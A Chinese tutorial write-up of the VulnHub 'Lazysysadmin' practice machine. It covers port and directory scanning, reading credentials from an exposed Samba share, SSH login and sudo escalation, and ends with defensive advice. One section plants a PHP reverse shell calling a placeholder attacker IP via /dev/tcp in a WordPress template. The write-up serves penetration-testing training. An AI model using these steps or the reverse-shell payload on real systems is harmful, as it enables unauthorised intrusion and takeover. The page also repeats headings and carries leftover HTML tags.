VulnHub 渗透测试入门(三) - Lazysysadmin 靶机实战教程<\/h1>

靶机环境概述<\/h2>
Lazysysadmin 是一个 VulnHub 上的渗透测试练习靶机，旨在帮助学习者掌握基本的渗透测试技能。该靶机运行在 Ubuntu 系统上，提供了多种常见的服务漏洞。<\/p>

环境下载<\/h3>

VirtualBox 或 VMware Workstation Player<\/li> <\/ul>

初始信息收集<\/h2>

使用 netdiscover<\/code> 扫描本地网络，发现目标IP:<\/p>

netdiscover -i wlo1
<\/span><\/span><\/code><\/pre>输出示例:<\/p>
192.168.0.100 08:00:27:da:8a:ac 1 42 PCS Systemtechnik GmbH
<\/code><\/pre>
2. 端口扫描<\/h3>
使用 masscan 快速扫描<\/h4>
masscan 192.168.0.100 -p 1-10000 --rate=<\/span>1000<\/span>
<\/span><\/span><\/code><\/pre>扫描结果:<\/p>
Discovered open port 3306\/tcp on 192.168.0.100
Discovered open port 6667\/tcp on 192.168.0.100
Discovered open port 22\/tcp on 192.168.0.100
Discovered open port 139\/tcp on 192.168.0.100
Discovered open port 80\/tcp on 192.168.0.100
Discovered open port 445\/tcp on 192.168.0.100
<\/code><\/pre>
使用 nmap 详细扫描<\/h4>
nmap -T4 -A -v 192.168.0.100 -p 0-10000
<\/span><\/span><\/code><\/pre>详细扫描结果:<\/p>

22\/tcp: OpenSSH 6.6.1p1 Ubuntu<\/li>
80\/tcp: Apache httpd 2.4.7 (Ubuntu)<\/li>
139\/tcp & 445\/tcp: Samba smbd 4.3.11-Ubuntu<\/li>
3306\/tcp: MySQL (未授权访问)<\/li>
6667\/tcp: InspIRCd<\/li>
<\/ul>
Web服务渗透<\/h2>
1. 目录扫描<\/h3>
使用 dirb 进行目录爆破:<\/p>
.\/dirb http:\/\/192.168.0.100 wordlists\/common.txt -o result.txt
<\/span><\/span><\/code><\/pre>重要发现:<\/p>

\/phpmyadmin\/<\/code> - phpMyAdmin 管理界面<\/li>
\/wordpress\/<\/code> - WordPress 站点<\/li>
\/info.php<\/code> - PHP 信息页面<\/li>
<\/ul>
2. robots.txt 分析<\/h3>
访问 http:\/\/192.168.0.100\/robots.txt<\/code> 发现:<\/p>
User-agent: *
Disallow: \/old\/
Disallow: \/test\/
Disallow: \/TR2\/
Disallow: \/Backnode_files\/
<\/code><\/pre>
这些目录可能存在敏感信息或漏洞。<\/p>
3. WordPress 扫描<\/h3>
使用 wpscan 扫描 WordPress:<\/p>
wpscan http:\/\/192.168.0.100\/wordpress\/
<\/span><\/span><\/code><\/pre>发现:<\/p>

WordPress 版本 4.8.5<\/li>
注册功能开启<\/li>
上传目录可列出<\/li>
使用 twentyfifteen 主题(v1.8)<\/li>
<\/ul>
Samba 服务渗透<\/h2>
1. enum4linux 扫描<\/h3>
enum4linux 192.168.0.100
<\/span><\/span><\/code><\/pre>发现:<\/p>

共享目录: share$<\/code> 和 print$<\/code><\/li>
用户: togie<\/code> (Unix User)<\/li>
<\/ul>
2. 访问共享目录<\/h3>
Linux 下挂载共享:<\/p>
mount -t cifs -o username=<\/span>''<\/span>,password=<\/span>''<\/span> \/\/192.168.0.100\/share$ \/mnt
<\/span><\/span><\/code><\/pre>Windows 下访问:<\/p>
net use k: \\192.168.0.100\share$
<\/span><\/span><\/code><\/pre>发现重要文件:<\/p>

deets.txt<\/code><\/li>
wp-config.php<\/code><\/li>
<\/ul>
从 wp-config.php<\/code> 中获取数据库凭据:<\/p>
define<\/span>('DB_USER'<\/span>, 'root'<\/span>);
<\/span><\/span>define<\/span>('DB_PASSWORD'<\/span>, 'TogieMYSQL12345^^'<\/span>);
<\/span><\/span><\/code><\/pre>数据库渗透<\/h2>
1. phpMyAdmin 登录<\/h3>
使用获取的凭据尝试登录 phpMyAdmin:<\/p>

用户名: root<\/code><\/li>
密码: TogieMYSQL12345^^<\/code><\/li>
<\/ul>
2. WordPress 用户凭据<\/h3>
从数据库中可以获取 WordPress 用户信息:<\/p>

用户名: Admin<\/code><\/li>
密码: TogieMYSQL12345^^<\/code><\/li>
<\/ul>
系统访问<\/h2>
1. SSH 登录<\/h3>
从 deets.txt<\/code> 获取凭据:<\/p>

用户名: togie<\/code><\/li>
密码: 12345<\/code><\/li>
<\/ul>
尝试 SSH 登录:<\/p>
ssh togie@192.168.0.100
<\/span><\/span><\/code><\/pre>成功登录后检查权限:<\/p>
whoami
<\/span><\/span>id
<\/span><\/span><\/code><\/pre>发现 togie<\/code> 用户有 sudo 权限:<\/p>
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
<\/code><\/pre>
2. 提权到 root<\/h3>
直接使用 sudo 提权:<\/p>
sudo su
<\/span><\/span><\/code><\/pre>输入密码 12345<\/code> 后获得 root 权限。<\/p>
替代渗透路径<\/h2>
1. WordPress 后台利用<\/h3>
使用获取的 WordPress 管理员凭据登录后台:<\/p>

URL: http:\/\/192.168.0.100\/wordpress\/wp-admin<\/code><\/li>
用户名: Admin<\/code><\/li>
密码: TogieMYSQL12345^^<\/code><\/li>
<\/ul>
2. 上传 PHP 反弹 shell<\/h3>
编辑 404.php 模板，插入 PHP 反弹 shell 代码:<\/p>
<?<\/span>php<\/span> exec<\/span>("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/攻击者IP\/1234 0>&1'"<\/span>); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>访问触发页面获取 shell:<\/p>
nc -vlp 1234<\/span>
<\/span><\/span><\/code><\/pre>3. 提权<\/h3>
获取的 www-data shell 权限有限，需要提权:<\/p>
python -c 'import pty; pty.spawn("\/bin\/sh")'<\/span>
<\/span><\/span><\/code><\/pre>检查系统信息:<\/p>
uname -r
<\/span><\/span>lsb_release -a
<\/span><\/span><\/code><\/pre>发现:<\/p>

内核版本: 4.4.0-31-generic<\/li>
Ubuntu 14.04.5 LTS<\/li>
<\/ul>
可使用 CVE-2017-1000112 进行提权。<\/p>
总结<\/h2>
渗透路径总结<\/h3>


信息收集<\/strong>:<\/p>

扫描发现开放端口和服务<\/li>
Web 目录爆破发现 WordPress 和 phpMyAdmin<\/li>
<\/ul>
<\/li>

Samba 共享<\/strong>:<\/p>

匿名访问共享获取数据库凭据<\/li>
发现系统用户凭据<\/li>
<\/ul>
<\/li>

系统访问<\/strong>:<\/p>

使用获取的 SSH 凭据直接登录<\/li>
利用 sudo 权限提权<\/li>
<\/ul>
<\/li>

替代路径<\/strong>:<\/p>

WordPress 后台管理<\/li>
上传 webshell 获取反向连接<\/li>
内核漏洞提权<\/li>
<\/ul>
<\/li>
<\/ol>
关键知识点<\/h3>


枚举是关键<\/strong>:<\/p>

全面的信息收集是渗透成功的基础<\/li>
不要忽视任何看似不重要的信息<\/li>
<\/ul>
<\/li>

凭证复用<\/strong>:<\/p>

在多个服务尝试相同的用户名\/密码组合<\/li>
用户往往会在不同服务使用相同或相似的密码<\/li>
<\/ul>
<\/li>

权限提升<\/strong>:<\/p>

检查 sudo 权限<\/li>
查找内核漏洞利用<\/li>
利用配置不当的服务<\/li>
<\/ul>
<\/li>

多路径渗透<\/strong>:<\/p>

同一目标通常有多种渗透路径<\/li>
当一条路径受阻时尝试其他方法<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h3>


系统加固<\/strong>:<\/p>

禁用不必要的服务<\/li>
及时更新系统和应用补丁<\/li>
限制共享目录的访问权限<\/li>
<\/ul>
<\/li>

密码策略<\/strong>:<\/p>

使用强密码并定期更换<\/li>
不同服务使用不同密码<\/li>
禁用默认账户或修改默认密码<\/li>
<\/ul>
<\/li>

权限控制<\/strong>:<\/p>

遵循最小权限原则<\/li>
限制 sudo 权限<\/li>
分离服务账户和系统账户<\/li>
<\/ul>
<\/li>

日志监控<\/strong>:<\/p>

启用并定期检查系统日志<\/li>
监控异常登录尝试<\/li>
设置入侵检测系统<\/li>
<\/ul>
<\/li>
<\/ol>
通过这个靶机的练习，可以全面掌握从信息收集到系统渗透的完整流程，以及多种渗透技术的实际应用。<\/p>

VulnHub 渗透测试入门(三) - Lazysysadmin 靶机实战教程<\/h1>

靶机环境概述<\/h2> Lazysysadmin 是一个 VulnHub 上的渗透测试练习靶机，旨在帮助学习者掌握基本的渗透测试技能。该靶机运行在 Ubuntu 系统上，提供了多种常见的服务漏洞。<\/p>

初始信息收集<\/h2>

2. 端口扫描<\/h3>

Web服务渗透<\/h2>

Samba 服务渗透<\/h2>

数据库渗透<\/h2>

系统访问<\/h2>

总结<\/h2>

靶机环境概述<\/h2>
Lazysysadmin 是一个 VulnHub 上的渗透测试练习靶机，旨在帮助学习者掌握基本的渗透测试技能。该靶机运行在 Ubuntu 系统上，提供了多种常见的服务漏洞。<\/p>